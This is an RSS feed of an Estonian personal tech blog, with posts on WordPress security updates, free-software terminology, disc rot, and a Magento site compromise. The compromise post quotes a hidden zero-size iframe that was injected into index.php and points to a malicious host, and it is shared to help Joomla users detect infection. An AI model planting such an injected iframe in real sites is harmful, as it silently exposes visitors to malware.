<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Discordia: Pronto &#187; Tarkvara</title>
	<atom:link href="http://pronto.pushspace.com/category/tehnika/tarkvara/feed/" rel="self" type="application/rss+xml" />
	<link>http://pronto.pushspace.com</link>
	<description>Tomorrow will be cancelled due to lack of interest</description>
	<lastBuildDate>Sun, 15 Jan 2012 01:12:43 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3</generator>
		<item>
		<title>WordPress v3.0.3</title>
		<link>http://pronto.pushspace.com/2467/wordpress-v3-0-3/</link>
		<comments>http://pronto.pushspace.com/2467/wordpress-v3-0-3/#comments</comments>
		<pubDate>Wed, 08 Dec 2010 20:56:09 +0000</pubDate>
		<dc:creator>pronto</dc:creator>
				<category><![CDATA[Tarkvara]]></category>
		<category><![CDATA[Turvaauk]]></category>
		<category><![CDATA[Uuendus]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[Wordpress v3.0.2]]></category>
		<category><![CDATA[Wordpress v3.0.3]]></category>
		<category><![CDATA[Wordpress v3.1]]></category>

		<guid isPermaLink="false">http://pronto.pushspace.com/?p=2467</guid>
		<description><![CDATA[Kes arvas, et pääseb enne loetud päevade jooksul saabuvat suuremat versioonimuutust (v3.1) oma WordPressi installatsiooni uuendamisest, see arvaku uuesti. Vaid paar päeva pärast viimase (v3.0.2) veaparanduse ilmumist tõstis pead veel üks turvakonarus, mis seekord lubab mittelokaalsetel pahatahtlikel kasutajatel soovi korral teha asju, milleks neil õigusi ei ole. Uusima versiooni leiab WordPressi koduleheküljelt ning soovi korral [...]]]></description>
			<content:encoded><![CDATA[<div id="attachment_2140" class="wp-caption alignleft" style="width: 160px"><a href="http://pronto.pushspace.com/wp-content/uploads/2009/07/wordpress.jpg"><img class="size-thumbnail wp-image-2140" title="Wordpress" src="http://pronto.pushspace.com/wp-content/uploads/2009/07/wordpress-150x150.jpg" alt="" width="150" height="150" /></a><p class="wp-caption-text">Wordpress</p></div>
<p>Kes arvas, et pääseb enne loetud päevade jooksul saabuvat suuremat versioonimuutust (v3.1) oma WordPressi installatsiooni uuendamisest, see arvaku uuesti. Vaid paar päeva pärast <a href="http://pronto.pushspace.com/2460/wordpress-v3-0-2/" target="_self">viimase (v3.0.2) veaparanduse ilmumist</a> tõstis pead veel üks turvakonarus, mis seekord lubab mittelokaalsetel pahatahtlikel kasutajatel soovi korral teha asju, milleks neil õigusi ei ole.</p>
<p>Uusima versiooni leiab <a href="http://wordpress.org/" target="_blank">WordPressi koduleheküljelt</a> ning soovi korral on seda võimalik alla laadida ka administreerimisliidese automaatse paigaldaja abil.</p>
]]></content:encoded>
			<wfw:commentRss>http://pronto.pushspace.com/2467/wordpress-v3-0-3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress v3.0.2</title>
		<link>http://pronto.pushspace.com/2460/wordpress-v3-0-2/</link>
		<comments>http://pronto.pushspace.com/2460/wordpress-v3-0-2/#comments</comments>
		<pubDate>Thu, 02 Dec 2010 07:44:21 +0000</pubDate>
		<dc:creator>pronto</dc:creator>
				<category><![CDATA[Tarkvara]]></category>
		<category><![CDATA[Uuendus]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[Wordpress v3.0.2]]></category>
		<category><![CDATA[Wordpress v3.1]]></category>

		<guid isPermaLink="false">http://pronto.pushspace.com/?p=2460</guid>
		<description><![CDATA[Meeldetuletuseks niipalju, et järgmise suurema versiooniuuenduseni (v3.1) on jäänud vaid paar nädalat, on WordPressi tiim väljastanud parandusversiooni v3.0.2. Eelkõige on see uuendus vajalik nendele, kes kasutavad oma keskkonnas rohkem kui ühte sisuautorit ning mitte kõik neist pole samade õigustega. Selgub, et väiksemate õigustega kasutajal on võimalik WordPressi vigu kasutades endale suuremaid õiguseid kaaperdada ja potentsiaalselt [...]]]></description>
			<content:encoded><![CDATA[<div id="attachment_2140" class="wp-caption alignleft" style="width: 160px"><a href="http://pronto.pushspace.com/wp-content/uploads/2009/07/wordpress.jpg"><img class="size-thumbnail wp-image-2140" title="Wordpress" src="http://pronto.pushspace.com/wp-content/uploads/2009/07/wordpress-150x150.jpg" alt="" width="150" height="150" /></a><p class="wp-caption-text">Wordpress</p></div>
<p>Meeldetuletuseks niipalju, et järgmise suurema versiooniuuenduseni (v3.1) on jäänud vaid paar nädalat, on WordPressi tiim väljastanud parandusversiooni v3.0.2. Eelkõige on see uuendus vajalik nendele, kes kasutavad oma keskkonnas rohkem kui ühte sisuautorit ning mitte kõik neist pole samade õigustega. Selgub, et väiksemate õigustega kasutajal on võimalik WordPressi vigu kasutades endale suuremaid õiguseid kaaperdada ja potentsiaalselt sellega kurja teha.</p>
]]></content:encoded>
			<wfw:commentRss>http://pronto.pushspace.com/2460/wordpress-v3-0-2/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Vaba vara?</title>
		<link>http://pronto.pushspace.com/2452/vaba-vara/</link>
		<comments>http://pronto.pushspace.com/2452/vaba-vara/#comments</comments>
		<pubDate>Sun, 31 Oct 2010 10:56:24 +0000</pubDate>
		<dc:creator>pronto</dc:creator>
				<category><![CDATA[Tarkvara]]></category>
		<category><![CDATA[Avatud lähtekood]]></category>
		<category><![CDATA[Eesti keel]]></category>
		<category><![CDATA[Freeware]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[Oracle Express]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Public Domain]]></category>
		<category><![CDATA[Tasuta tarkvara]]></category>
		<category><![CDATA[Vabavara]]></category>

		<guid isPermaLink="false">http://pronto.pushspace.com/?p=2452</guid>
		<description><![CDATA[Ma teen ettepaneku lõpetada sellise sõna nagu vabavara ebasihipärase kasutamise ära. Tegemist on tavaliselt väärtõlkega inglise keelest, kus sõna free tähendab üheaegselt nii "vaba" kui "tasuta". Miks ma sellest räägin? Ma räägin seda sellepärast, et sõna kasutus või väärkasutus mõjutab seda kuidas inimene suhtub ühte või teise tootesse. Tasuta tarkvara ehk freeware ei pruugi olla [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://pronto.pushspace.com/wp-content/uploads/2010/10/freeware.png"><img class="alignleft size-thumbnail wp-image-2453" title="Tasuta" src="http://pronto.pushspace.com/wp-content/uploads/2010/10/freeware-150x150.png" alt="" width="150" height="150" /></a>Ma teen ettepaneku lõpetada sellise sõna nagu vabavara ebasihipärase kasutamise ära. Tegemist on tavaliselt väärtõlkega inglise keelest, kus sõna <em>free</em> tähendab üheaegselt nii "vaba" kui "tasuta".</p>
<p>Miks ma sellest räägin? Ma räägin seda sellepärast, et sõna kasutus või väärkasutus mõjutab seda kuidas inimene suhtub ühte või teise tootesse. Tasuta tarkvara ehk <em>freeware</em> ei pruugi olla automaatselt avatud lähtekoodiga ega ka "vaba" vara. Näiteks Oracle Express (Oracle Database XE) on tasuta tarkvara, kuna selle eest ei pea sentigi lauale veeretama, ometigi pole see "vaba", sest Oracle hoiab endale kõik sellega seotud õigused. Teisest küljest võttes ei tohi unustada, et isegi kui tootega antakse kaasa lähtekood, ei pruugi see seda automaatselt "vabaks" teha. Näiteks praktiliselt kogu PHP tasuline tarkvara on avatud lähtekoodiga ja ometigi mitte "vaba".</p>
<p>Õigupoolest ei nimetaks ma vabaks varaks ka ühtegi GPL litsentsiga tarkvara, sest GPL seab paika päris jõhkrad reeglid kuidas seda tarkvara võib või ei või kasutada. Minu silmis on vabavara vaid <em>public domain</em> tarkvara, mille omaniku ja litsentsitingimusi kas ei ole võimalik tuvastada või on omanik loobunud kõikidest õigustest sellele. Taolist vara võib kasutada kuidas pähe tuleb -- laiendada, muuta, müüa (juhul kui ostja leiab), jagada, jne. Kui omanik on teada siis võib talle viidata, aga ka selle jaoks pole mingit kohustust.</p>
<p>Nagu olen ma jõudnud välja punkti, et enamus tarkvara, mida traditsiooniliselt kiputakse Eestis vabavaraks nimetama ei ole teps mitte vaba, vaid hoopis a) avatud lähtekoodiga (<em>open source</em>) ja b) tasuta (<em>freeware</em>).</p>
]]></content:encoded>
			<wfw:commentRss>http://pronto.pushspace.com/2452/vaba-vara/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Disc rot</title>
		<link>http://pronto.pushspace.com/2263/disc-rot/</link>
		<comments>http://pronto.pushspace.com/2263/disc-rot/#comments</comments>
		<pubDate>Sat, 12 Sep 2009 06:44:29 +0000</pubDate>
		<dc:creator>pronto</dc:creator>
				<category><![CDATA[Kategooria puudub]]></category>
		<category><![CDATA[Tarkvara]]></category>
		<category><![CDATA[CD]]></category>
		<category><![CDATA[Disc rot]]></category>
		<category><![CDATA[DVD]]></category>
		<category><![CDATA[Mac OS X]]></category>

		<guid isPermaLink="false">http://pronto.pushspace.com/?p=2263</guid>
		<description><![CDATA[Pakkisin hiljuti ühe kasti lahti, mis sisaldas erinevatel aegadel sinna paigutatud andmeid, põletatuna CD-de ja DVD-de peale. Ma proovisin paari vanemat neist lugeda, aga edu selles valdkonnas oli üsna vahelduv -- üle 10 aasta tagasi kirjutatud CD-d ei pruugi sugugi enam loetavad olla. Üks termin, mida sellistel puhkudel kasutatakse on disc rot, ehk kettakõdu. Seoses [...]]]></description>
			<content:encoded><![CDATA[<div id="attachment_2264" class="wp-caption alignleft" style="width: 160px"><a href="http://pronto.pushspace.com/wp-content/uploads/2009/09/Disc_rot.jpg"><img class="size-thumbnail wp-image-2264" title="Disc rot" src="http://pronto.pushspace.com/wp-content/uploads/2009/09/Disc_rot-150x150.jpg" alt="Disc rot" width="150" height="150" /></a><p class="wp-caption-text">Disc rot</p></div>
<p>Pakkisin hiljuti ühe kasti lahti, mis sisaldas erinevatel aegadel sinna paigutatud andmeid, põletatuna CD-de ja DVD-de peale. Ma proovisin paari vanemat neist lugeda, aga edu selles valdkonnas oli üsna vahelduv -- üle 10 aasta tagasi kirjutatud CD-d ei pruugi sugugi enam loetavad olla. Üks termin, mida sellistel puhkudel kasutatakse on <em>disc rot</em>, ehk kettakõdu.</p>
<p>Seoses sellega tekkiski mul küsimus: kas Mac OS-i jaoks on olemas mingit tarkvara, mis võimaldab selliseid kettaid tuvastada. Ma pean silmas seda, et pistad ketta masinasse, arvuti suristab natuke aega ja ütleb, et sellelt kettalt on lugemisega raskusi. Taoline asi võimaldab mul tuvastada säilivusprobleeme juba algfaasis, teha vajalikust kraamist koopiaid ja mittevajaliku kraami ilma igasuguste südametunnistusepiinadeta prügikasti toimetada.</p>
]]></content:encoded>
			<wfw:commentRss>http://pronto.pushspace.com/2263/disc-rot/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>I got pwnd!</title>
		<link>http://pronto.pushspace.com/2252/i-got-pwnd/</link>
		<comments>http://pronto.pushspace.com/2252/i-got-pwnd/#comments</comments>
		<pubDate>Mon, 07 Sep 2009 11:14:48 +0000</pubDate>
		<dc:creator>pronto</dc:creator>
				<category><![CDATA[Tarkvara]]></category>
		<category><![CDATA[Iframe]]></category>
		<category><![CDATA[Joomla]]></category>
		<category><![CDATA[Magento]]></category>
		<category><![CDATA[Pwn]]></category>
		<category><![CDATA[Worm]]></category>

		<guid isPermaLink="false">http://pronto.pushspace.com/?p=2252</guid>
		<description><![CDATA[Kuradi raisakurat! Teate, alalõpmata kirjutatakse õudusjuttu sellest, kuidas üks või teine viirus kurja teeb ja kuidas üks või teine worm kuskil asju vasakule tõstab. Enamasti on need kirjutatud inimeste poolt, kes teavad sellistest asjadest kolmandate inimeste vahendusel ja kelle eesmärk on pakkuda põnevust inimestele, kes jutust aru ei saa. Samad inimesed kirjutavad lehtedesse ka seiklusjutte [...]]]></description>
			<content:encoded><![CDATA[<div id="attachment_2255" class="wp-caption alignleft" style="width: 160px"><a href="http://pronto.pushspace.com/wp-content/uploads/2009/09/Joomla_Symbol_Color.png"><img class="size-thumbnail wp-image-2255" title="Joomla" src="http://pronto.pushspace.com/wp-content/uploads/2009/09/Joomla_Symbol_Color-150x150.png" alt="Joomla" width="150" height="150" /></a><p class="wp-caption-text">Joomla</p></div>
<p>Kuradi raisakurat! Teate, alalõpmata kirjutatakse õudusjuttu sellest, kuidas üks või teine viirus kurja teeb ja kuidas üks või teine worm kuskil asju vasakule tõstab. Enamasti on need kirjutatud inimeste poolt, kes teavad sellistest asjadest kolmandate inimeste vahendusel ja kelle eesmärk on pakkuda põnevust inimestele, kes jutust aru ei saa. Samad inimesed kirjutavad lehtedesse ka seiklusjutte sellest, kuidas "Arctic Sea"-ga tiibrakette veetakse. Intrigeeriv, aga peaaegu alati ainult teoreetiline lugemine.</p>
<p>Täna siis märkasin, et millegipärast minu mõlemad Magento installatsioonid on käpa maha pannud veateatega, mis viitab justkui oleks programmikood vigane. Viskasin Magento index.php-le pilgu peale ja etskae: faili lõppu on tekkinud iseeneseslikult järgnev rida:</p>
<blockquote>
<pre>&lt;iframe src="http://google-analyze.org/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no&gt;&lt;/iframe&gt;</pre>
</blockquote>
<p>Paanika! Kiire otsing näitas, et tegemist on selge pahavaraga, mis kuidagi mu masinasse on pugenud ja seal oma valgustkartvaid tegusi sooritab. Edasine otsing viitas sellele, et suure tõenäosusega on tegemist ka SQL injectionist tingitud rünnakuga. Veelgi edasisem otsing tuvastas masinast mingil iidsel ajal sinna testimiseks üles pandud Joomla installatsiooni, mis osutuski ründevektori alguspunktiks.</p>
<p>Soovitus nüüd kõigile, kes Joomlat kasutavad. Vaadake, ega teil kusagil failides iframe-ga algavat rida ei ole, mida te ei mäleta sinna pannud olevat. See aadress, mis src sees on, võib olla teine, kuid suures plaanis peaks välimus umbes sama olema. Minu puhul jäi see muudatus vahele ainult Magento eripärade tõttu, enamustel jääkski see ilmselt kahe silma vahele. Joomla on meil üsna levinud tarkvara ja ma ei usu mitte, et igaüks viitsib oma installatsioone regulaarselt uuendada.</p>
<p><em>Update early, update often!</em></p>
]]></content:encoded>
			<wfw:commentRss>http://pronto.pushspace.com/2252/i-got-pwnd/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

